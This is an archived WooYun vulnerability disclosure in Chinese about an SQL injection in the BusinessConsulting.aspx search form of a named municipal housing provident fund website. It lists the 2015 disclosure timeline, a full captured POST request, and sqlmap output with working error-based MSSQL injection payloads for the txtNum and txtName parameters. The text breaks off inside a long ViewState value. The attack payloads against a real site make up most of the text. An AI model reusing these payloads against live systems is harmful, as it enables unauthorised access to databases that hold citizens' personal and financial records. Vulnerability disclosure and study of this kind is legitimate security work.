乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
发现一处SQL注入,同时禁用了文件读取,但是另一处上传记录处没有修补!~~~有做了防注入的了,本人不才有些绕不过去就算了!~~~
1、抓包
POST http://www.smgjj.com/BusinessConsulting.aspx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://www.smgjj.com/BusinessConsulting.aspxAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: www.smgjj.comContent-Length: 7981Connection: Keep-AlivePragma: no-cacheCookie: _gscbrs_477307201=1; _gscu_477307201=39621761kckh7n12; _gscs_477307201=t39622311hhxnek41|pv:3; ASP.NET_SessionId=j4wpzi45gqjugy45vbyo15rs; DBInformation=DBInformation_T_Information_T_Information.Clicks=,f04afaa5-4f96-48a2-8836-48d535f49909Guest,; SiteFunction=SiteFunction_House=,1208,__VIEWSTATE=%2FwEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYUAgEPZBYCAgEPFgIeC18hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hvbWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0luc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5OS05MjBlLTQ5YjQtOTViOC01M2Q3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI%2BL05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz00ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS%2F562W5rOV6KeEZAIED2QWAmYPFQI%2BL05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTRmOGEM6LWE6K6v5L%2Bh5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga%2FlhazlvIBkAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg%2FY2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjktYWZmZjdmYjU0ZTdmDOWKnuS6i%2BaMh%2BWNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2NsYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2ZGE2MTlhMwzlj6%2FotLfmpbznm5hkAggPZBYCZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur%2Fmn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25zdWx0aW5nLmFzcHgM5Zyo57q%2F5ZKo6K%2BiZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b%2BD5Zyw5Zu%2BZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9Eb3duTG9hZExpc3QuYXNweAzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgMCBAIFFgYQBQ0tLeivt%2BmAieaLqS0tZWcQBRXkvY%2FmiL%2Flhaznp6%2Fph5HlvIDmiLcFATBnEAUV5L2P5oi%2F5YWs56ev6YeR57y05a2YBQExZxAFFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr%2BWPlgUBMmcQBRXkvY%2FmiL%2Flhaznp6%2Fph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2RkAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5LiJ5piO5biC5L2P5oi%2F5YWs56ev6YeR5Lia5Yqh5ZKo6K%2Bi54Ot57q%2FZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLXor53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFDxBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K%2B36YCJ5oupLS1lZxAFFeS9j%2BaIv%2BWFrOenr%2BmHkeW8gOaItwUBMGcQBRXkvY%2FmiL%2Flhaznp6%2Fph5HnvLTlrZgFATFnEAUV5L2P5oi%2F5YWs56ev6YeR5pSv5Y%2BWBQEyZxAFFeS9j%2BaIv%2BWFrOenr%2BmHkei0t%2BasvgUBM2cQBQblhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW%2Fgw%2FotYTph5HlvZLpm4bnp5EP6LWE6YeR6L%2BQ5L2c56eRD%2BiuoeWIkui0ouWKoeenkQ%2FlrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD%2BWkp%2BeUsOeuoeeQhumDqA%2FmsLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD%2Ba4hea1geeuoeeQhumDqA%2FlroHljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD%2BazsOWugeeuoeeQhumDqA%2FlsIbkuZDnrqHnkIbpg6gP5rKZ5Y6%2F566h55CG6YOoD%2BWwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQwMTA1BDAyMDAEMDMwMAQwNDAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2dnZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8WAh8AAgUWCgIBD2QWBmYPFQEJ6ZmI5rC05p2%2BZAIBDw8WAh8BBQblhbbku5ZkZAICDxUFG%2BaAjuS5iOWPmOabtOWFrOenr%2BmHkemineW6pgoyMDE1LTA4LTAzQuaIkeS4gOWJjee8tOeahOmineW6puWkquWwkeS6hiAgIOaIkeaDs%2BWkmuS6pOS4gOeCueimgeaAjuS5iOaUue%2B8n0%2FnlLHljZXkvY3otKLliqHlnKjmr4%2FlubTnmoQ344CBOOS4pOaciOWKnueQhuWFrOenr%2BmHkeWfuuaVsOaguOWumuWSjOiwg%2BaVtOOAgg0KCjIwMTUtMDgtMTFkAgIPZBYGZg8VAQPmnahkAgEPDxYCHwEFFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr%2BWPlmRkAgIPFQUG6L%2BY6LS3CjIwMTUtMDctMzGwAeWJjeWHoOW5tOeUqOWFrOenr%2BmHkei0t%2Basvui0reaIv%2B%2B8jOeOsOWcqOWFrOenr%2BmHkee8tOi0ueagh%2BWHhumrmOS6hu%2B8jOiDveS4jeiDveaPkOmrmOi%2FmOi0t%2Bagh%2BWHhu%2B8jOaPkOWJjei%2FmOa4hei0t%2BasvuOAguaIluiAheWFrOenr%2BmHkei%2FmOacieayoeacieWFtuS7lueUqOmAlO%2B8n%2Biwouiwou%2B8gQ0KSuS4jeiDveaPkOmrmOaciOi%2FmOasvumine%2B8jOS9huWPr%2BS7peaPkOWJjeW9kui%2FmOmDqOWIhuaIluWFqOmDqOacrOmHkeOAgg0KCjIwMTUtMDgtMTFkAgMPZBYGZg8VAQnlj7bpl73pobpkAgEPDxYCHwEFFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr%2BWPlmRkAgIPFQUP5o%2BQ5Y%2BW5YWs56ev6YeRCjIwMTUtMDctMzFC5pys5Lq65Zyo56aP5bee6LSt5Lmw5LqG5ZWG5ZOB5oi%2F77yM6IO95ZCm5o%2BQ5Y%2BW5YWs56ev6YeR6L%2BY6LS344CCC%2BS4jeihjOOAgg0KCjIwMTUtMDgtMTFkAgQPZBYGZg8VAQPmnahkAgEPDxYCHwEFBuWFtuS7lmRkAgIPFQUM5bel6LWE5Z%2B65pWwCjIwMTUtMDctMzFX6IGM5bel5LiK5bm05pyI5bmz5Z2H5bel6LWE5YyF5ZCr5ZOq5Lqb77yM6K%2B36K%2Bm57uG5Lqb44CC5ZCM5Z%2BO5piv5LiN5piv5bqU6K%2Bl5LiA6Ie077yftgMyMDE15bm05bqm77yIMjAxNeW5tDfmnIgx5pel6IezMjAxNuW5tDbmnIgzMOaXpe%2B8jOS4i%2BWQjCDvvInogYzlt6XkvY%2FmiL%2Flhaznp6%2Fph5HnmoTmnIjnvLTlrZjlt6XotYTln7rmlbDkuLrogYzlt6XmnKzkurrkuIrlubTmnIjlubPlnYflt6XotYTjgILogYzlt6Xlt6XotYTmgLvpop3nmoTorqHnrpfmjInnhaflm73lrrbnu5%2ForqHlsYDjgIrlhbPkuo7orqTnnJ%2FotK%2FlvbvmiafooYzjgIjlt6XotYTmgLvpop3nu4TmiJDnmoTop4TlrprjgInnmoTpgJrnn6XjgIvvvIjnu5%2FliLblrppbMTk5MF0x5Y%2B377yJ5ZKM44CK5YWz5LqO5py65YWz5ZKM5LqL5Lia5Y2V5L2N5bel5L2c5Lq65ZGY5bel6LWE5Yi25bqm5pS56Z2p5ZCO5Yqz5Yqo57uf6K6h6Iul5bmy6Zeu6aKY55qE6YCa55%2Bl44CL77yI5Zu957uf5a2XWzE5OTRdMzflj7fvvInnmoTop4TlrprmiafooYzjgIIgDQoKMjAxNS0wOC0xMWQCBQ9kFgZmDxUBBuWwj%2BW8oGQCAQ8PFgIfAQUV5L2P5oi%2F5YWs56ev6YeR6LS35qy%2BZGQCAg8VBTPpgJDlubTlhrLov5jotLflpoLkvZXovazkuLrlvZLov5jpg6jliIbotLfmrL7mnKzph5EKMjAxNS0wNy0zMJAC5aSr5aa75L%2Bp5piv5riF5rWB5Lq677yM5YWs56ev6YeR5Zyo5riF5rWB77yM5oiR5L%2Bp5Zyo5LiJ5piO5Lmw5oi%2F77yM5LqOMjAxNOW5tDnmnIjlnKjkuInmmI7lhaznp6%2Fph5Hlip7nkIbpgJDlubTlhrLov5jotLfkuJrliqHvvIznjrDlnKjmiJHkuIjlpKvmg7Pmj5Dlj5bkvY%2FmiL%2Flhaznp6%2Fph5HlvZLov5jpg6jliIbotLfmrL7mnKzph5HvvIzogIzmiJHmnKzkurrnu6fnu63lip7nkIbpgJDlubTlhrLov5jotLfkuJrliqHjgILor7fpl67lpoLkvZXlip7nkIbkuJrliqHjgIJw6K%2B35Yiw5YWs56ev6YeR566h55CG6YOo5Yqe55CG5q2k6aG55Lia5Yqh77yM5YW35L2T5Yqe55CG5rWB56iL5Y%2Bv5Lul5ouo5omT5oiR5Lit5b%2BD5pyN5Yqh54Ot57q%2FMTIzMjnlkqjor6LjgIINCgoyMDE1LTA4LTExZAIlDw8WBB4NUGFnZXJQYWdlU2l6ZQIFHg5QYWdlclJlY29yZE51bQLoD2RkAicPZBYIAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUITGlua05hbWUeDkRhdGFWYWx1ZUZpZWxkBQdMaW5rVXJsHgtfIURhdGFCb3VuZGdkEBUDEy0tLeWQiOS9nOWNleS9jS0tLS0e5LiJ5piO5oi%2F5Zyw5Lqn566h55CG5L%2Bh5oGv572RHuS4ieaYjuS9j%2BaIv%2Be9ruS4muaLheS%2FneWFrOWPuBUDABdodHRwOi8vd3d3LnNtZmRjLmNvbS5jbhNodHRwOi8vd3d3LnNtZmRjLmNuFCsDA2dnZ2RkAgMPEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVBRMtLS3mlL%2Flupzpg6jpl6gtLS0tG%2BS4ieaYjuW4guS6uuawkeaUv%2BW6nOe9keermR7kuK3lpK7kurrmsJHmlL%2Flupzpl6jmiLfnvZHnq5kY56aP5bu655yB5bu66K6%2B5L%2Bh5oGv572REuemj%2BW7uuecgei0ouaUv%2BWOhRUFABRodHRwOi8vd3d3LnNtLmdvdi5jbhJodHRwOi8vd3d3Lmdvdi5jbi8XaHR0cDovL3d3dy5mampzLmdvdi5jbi8ZaHR0cDovL3d3dy5mamljcGEub3JnLmNuLxQrAwVnZ2dnZ2RkAgUPEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVDBYtLS3lhbbku5blhaznp6%2Fph5EtLS0tG%2Bemj%2BW3nuS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvljqbpl6jkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5ryz5bee5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BazieW3nuS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvpvpnlsqnkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5Y2X5bmz5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BWugeW%2Bt%2BS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvojobnlLDkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5YyX5Lqs5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BS4iua1t%2BS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvlpKnmtKXkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kVDAAWaHR0cDovL3d3dy5menpmZ2pqLmNvbRdodHRwOi8vd3d3LnhtZ2pqLmdvdi5jbhhodHRwOi8vd3d3Lnp6Z2pqLmdvdi5jbi8UaHR0cDovL3d3dy5xemdqai5jb20ZaHR0cDovL3d3dy5sb25neWFuZ2pqLmNvbRRodHRwOi8vd3d3Lm5wZ2pqLmNvbRRodHRwOi8vd3d3Lm5kZ2pqLmNvbRRodHRwOi8vd3d3LnB0Z2pqLmNvbRdodHRwOi8vd3d3LmJqZ2pqLmdvdi5jbhRodHRwOi8vd3d3LnNoZ2pqLmNvbRdodHRwOi8vd3d3LmhvdXNlZnVuZC5jbhQrAwxnZ2dnZ2dnZ2dnZ2dkZAIHDxAPFgYfBAUITGlua05hbWUfBQUHTGlua1VybB8GZ2QQFQgTLS0t5YW25LuW572R56uZLS0tLQ%2FmiL%2FkuqfkuYvnqpfnvZEG55m%2B5bqmCeS6uuawkee9kQnlkozorq%2FnvZEJ5paw5Y2O572RD%2Bemj%2BW3nuaQnOaIv%2Be9kQnkuK3ljY7nvZEVCAAYaHR0cDovL3d3dy5laG9tZWRheS5jb20vFGh0dHA6Ly93d3cuYmFpZHUuY29tGWh0dHA6Ly93d3cucGVvcGxlLmNvbS5jbi8VaHR0cDovL3d3dy5oZXh1bi5jb20vGWh0dHA6Ly93d3cueGluaHVhbmV0LmNvbS8VaHR0cDovL2Z6LnNvdWZ1bi5jb20vG2h0dHA6Ly93d3cuY2hpbmEuY29tL3poX2NuLxQrAwhnZ2dnZ2dnZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQ5pbWdXb1lhb0xpdVlhbgUPaW1nU3VvWW91TGl1WWFuBQlidG5TZWFyY2hHU5WsOeLNURhDdMD4YguEKHXOhQ%3D%3D&__EVENTVALIDATION=%2FwEWLgK1ioylBwLu2pbfAwLHoITABwKL%2B9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG%2B5ajBwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb%2B8ahBAKln%2FPuCgK9l%2BPkCwKN5NbZBwLb2KFcAuXp1uwLAv%2BYtpwJAvzjt4ACApbribUJAtON%2BOkCAuGR%2B4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr%2FFrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgxWbSV5LGmy1%2FjwpAb46N3VOJVvrw%3D%3D&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1%24dlsthzdw=&HomePageBottomInfo1%24dlstzfbm=&HomePageBottomInfo1%24dlstqtgjj=&HomePageBottomInfo1%24dlstqtwz=&btnSearch.x=33&btnSearch.y=14
txtNum、txtName存在注入
sqlmap identified the following injection points with a total of 2308 HTTP(s) requests:---Place: POSTParameter: txtNum Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYWAgEPZBYCAgEPFgIeC18hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hvbWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0luc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5OS05MjBlLTQ5YjQtOTViOC01M2Q3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz00ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS/562W5rOV6KeEZAIED2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTRmOGEM6LWE6K6v5L+h5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga/lhazlvIBkAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg/Y2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjktYWZmZjdmYjU0ZTdmDOWKnuS6i+aMh+WNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2NsYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2ZGE2MTlhMwzlj6/otLfmpbznm5hkAggPZBYCZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur/mn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25zdWx0aW5nLmFzcHgM5Zyo57q/5ZKo6K+iZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b+D5Zyw5Zu+ZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9Eb3duTG9hZExpc3QuYXNweAzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgMCBAIFFgYQBQ0tLeivt+mAieaLqS0tZWcQBRXkvY/miL/lhaznp6/ph5HlvIDmiLcFATBnEAUV5L2P5oi/5YWs56ev6YeR57y05a2YBQExZxAFFeS9j+aIv+WFrOenr+mHkeaUr+WPlgUBMmcQBRXkvY/miL/lhaznp6/ph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2RkAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5LiJ5piO5biC5L2P5oi/5YWs56ev6YeR5Lia5Yqh5ZKo6K+i54Ot57q/ZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLXor53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFDxBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K+36YCJ5oupLS1lZxAFFeS9j+aIv+WFrOenr+mHkeW8gOaItwUBMGcQBRXkvY/miL/lhaznp6/ph5HnvLTlrZgFATFnEAUV5L2P5oi/5YWs56ev6YeR5pSv5Y+WBQEyZxAFFeS9j+aIv+WFrOenr+mHkei0t+asvgUBM2cQBQblhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW/gw/otYTph5HlvZLpm4bnp5EP6LWE6YeR6L+Q5L2c56eRD+iuoeWIkui0ouWKoeenkQ/lrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD+Wkp+eUsOeuoeeQhumDqA/msLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD+a4hea1geeuoeeQhumDqA/lroHljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD+azsOWugeeuoeeQhumDqA/lsIbkuZDnrqHnkIbpg6gP5rKZ5Y6/566h55CG6YOoD+WwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQwMTA1BDAyMDAEMDMwMAQwNDAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2dnZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8WAh8AZmQCIw8PFgIeB1Zpc2libGVnZGQCJQ8PFgYeDVBhZ2VyUGFnZVNpemUCBR4OUGFnZXJSZWNvcmROdW1mHg5QYWdlclBhZ2VJbmRleAIBZGQCJw9kFggCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZhbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuInmmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5LiJ5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQMAF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUFEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5biC5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uuawkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIHlu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZqanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUMFi0tLeWFtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+WFrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaznp6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56ev6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+mHkee9keermRvljZflubPkvY/miL/lhaznp6/ph5HnvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9keermRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5kb5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+Wkqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZodHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly93d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenpnamouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmNvbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3cubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG91c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgcPEA8WBh8GBQhMaW5rTmFtZR8HBQdMaW5rVXJsHwhnZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeWSjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmVob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxVodHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc291ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20vemhfY24vFCsDCGdnZ2dnZ2dnZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDmltZ1dvWWFvTGl1WWFuBQ9pbWdTdW9Zb3VMaXVZYW4FCWJ0blNlYXJjaDS79vZyaNg/Si/Qvfd08ltzABpu&__EVENTVALIDATION=/wEWLgKro+2nDQLu2pbfAwLHoITABwKL+9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG+5ajBwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb+8ahBAKln/PuCgK9l+PkCwKN5NbZBwLb2KFcAuXp1uwLAv+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr/FrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgzzQoCFRGmiTihZZ/sQvN+N8yI+zw==&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2&dlstRange=2&txtNum=1' AND 7297=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (7297=7297) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(113))) AND 'iMLY'='iMLY&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14Place: POSTParameter: txtName Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYWAgEPZBYCAgEPFgIeC18hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hvbWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0luc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5OS05MjBlLTQ5YjQtOTViOC01M2Q3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz00ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS/562W5rOV6KeEZAIED2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTRmOGEM6LWE6K6v5L+h5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga/lhazlvIBkAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg/Y2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjktYWZmZjdmYjU0ZTdmDOWKnuS6i+aMh+WNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2NsYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2ZGE2MTlhMwzlj6/otLfmpbznm5hkAggPZBYCZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur/mn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25zdWx0aW5nLmFzcHgM5Zyo57q/5ZKo6K+iZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b+D5Zyw5Zu+ZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9Eb3duTG9hZExpc3QuYXNweAzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgMCBAIFFgYQBQ0tLeivt+mAieaLqS0tZWcQBRXkvY/miL/lhaznp6/ph5HlvIDmiLcFATBnEAUV5L2P5oi/5YWs56ev6YeR57y05a2YBQExZxAFFeS9j+aIv+WFrOenr+mHkeaUr+WPlgUBMmcQBRXkvY/miL/lhaznp6/ph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2RkAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5LiJ5piO5biC5L2P5oi/5YWs56ev6YeR5Lia5Yqh5ZKo6K+i54Ot57q/ZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLXor53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFDxBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K+36YCJ5oupLS1lZxAFFeS9j+aIv+WFrOenr+mHkeW8gOaItwUBMGcQBRXkvY/miL/lhaznp6/ph5HnvLTlrZgFATFnEAUV5L2P5oi/5YWs56ev6YeR5pSv5Y+WBQEyZxAFFeS9j+aIv+WFrOenr+mHkei0t+asvgUBM2cQBQblhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW/gw/otYTph5HlvZLpm4bnp5EP6LWE6YeR6L+Q5L2c56eRD+iuoeWIkui0ouWKoeen